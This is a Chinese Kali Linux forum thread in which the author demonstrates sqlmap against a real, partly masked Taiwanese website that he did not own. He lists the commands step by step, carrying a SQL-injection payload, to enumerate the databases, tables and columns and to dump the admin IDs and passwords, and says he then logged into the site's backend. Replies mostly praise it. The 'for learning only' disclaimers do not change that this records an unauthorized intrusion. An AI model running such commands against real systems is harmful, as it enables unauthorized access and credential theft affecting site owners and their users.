Kali 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 17059|回复: 10

[教程] 实战演示sqlmap注入攻击

  [复制链接]
发表于 2015-12-13 00:30:13 | 显示全部楼层 |阅读模式
0x0  写在前
今天给大家写一下运用sqlmap实战演示检测网站,下面网站url我会尽量缩写和打乱,但是这是一个真实存在的站点,只是不希望发出来大家去造成太大的破坏,而且本教程只是提供对sqlmap这个工具的认知以及最基础的使用,希望大家在做检测的时候不要做过激的行为,好了废话不多说。
0x1 事件经过

今晚某群一个人说他的w3af不能正常使用,因为他已经知道这个站存在注入点但是用工具却扫不出来,后来我就问他要了这个网站做了初级的检测后发现存在sql注入点,url: http://www.poxxxcom.tw/pron.php ... %20%2715%27%3D%2715,一个台湾的站点,接下来就开始今天的主讲。


0x2 Sqlmap注入点检测

打开sqlmap,先把url丢给sqlmap去跑,命令:
  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%271
复制代码


结果如下图:
QQ截图20151218213354.png

从图中我们可以看出,这个注入点提交的类型是get型,数据库为Mysql5.0.11,系统是Linux CentOS5.8,服务器版本是Apache2.2.3,确定这个注入点可行,接下来我们试试列出它的数据库。

0x3 Sqlmap列数据库
命令:
  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --dbs
复制代码
检测结果如下:
QQ截图20151212221439.png


已经列出4个数据库,这里我们列第三个,因为他是网站名称。

0x4 Sqlmap查询指定数据库中的表单
命令:
  1. sqlmap -u http://www.poxxcom.tw/prn.php?cid=15%27%20OR%20%2715%27%3D%2715 --tables -D "poxxx_db"
复制代码
检测结果如下图:

QQ截图20151213001731.png


0x5 Sqlmap查询指定表单内的字段
命令:
  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --columns -T "jt_admin" -D "poxxx_d"
复制代码
检测结果如下图:
QQ截图20151213001520.png


0x6 Sqlmap查询指定字段内的内容
命令:
  1. sqlmap -u http://www.poxxx.com.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --dump -C "ID,password" -T "jt_admin" -D "proxxx_db"
复制代码
扫描结果如下:
QQ截图20151213001429.png

0x7 最后
  写这篇实战,让大家更了解和清楚的明白sqlmap这个工具的基础命令,这篇文章记录的时间也是可以看到的,洗澡吃饭都丢在那里检测的,还是那句话一切为了学习,希望大家在使用的过程中懂得把握得当,这篇教程只到这里,后台已经登录后退出。end

           -这是一个小广告






评分

参与人数 1威望 +1 骨头 +38 收起 理由
blackeagle + 1 + 38 赞一个!

查看全部评分

+1
17071°C
10
  • lovekail
  • abs-阎
  • kundera29
  • Kuma
  • FR13ND
过: 他们
发表于 2015-12-26 12:24:47 | 显示全部楼层
不错 写的很详细  学习了  
回复 支持 反对

使用道具 举报

发表于 2016-1-24 00:02:09 | 显示全部楼层
很基础的科普了!辛苦
回复 支持 反对

使用道具 举报

发表于 2016-5-18 12:38:46 | 显示全部楼层

66666666666666666666666
回复 支持 反对

使用道具 举报

发表于 2017-4-6 10:51:04 | 显示全部楼层
为数不多写的很详细,每一步都注释的,对新手很好用,如果在前沿加上命令汇总最好了(虽然不一定需要)
回复 支持 反对

使用道具 举报

发表于 2017-5-23 10:45:41 | 显示全部楼层
终于觉得我来对了地方,唉,为什么不早点注册呢。。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2017-5-25 22:36:39 | 显示全部楼层
Kuma 发表于 2017-4-6 10:51
为数不多写的很详细,每一步都注释的,对新手很好用,如果在前沿加上命令汇总最好了(虽然不一定需要)

好的,下次注意。
回复 支持 反对

使用道具 举报

发表于 2018-9-8 11:05:28 | 显示全部楼层
谢谢.写的详细.好好看.
回复 支持 反对

使用道具 举报

发表于 2018-9-9 22:26:46 | 显示全部楼层
学习了,不错不错 !!!!!
回复 支持 反对

使用道具 举报

发表于 2018-12-21 03:37:01 | 显示全部楼层
能查询到数据库和表名,但是查询表显示不出内容,提示the SQL query provided does not return any output,请问是什么问题
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Kali linux ( 蜀ICP备10027298号-4 ) Topics |


免责声明:
Kali linux中文网所发布的一切教程文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。

GMT+8, 2019-6-27 06:49 , Processed in 0.300567 second(s), 27 queries , Gzip On.

Powered by Discuz!

© 2009-2016 KALI

快速回复 返回顶部 返回列表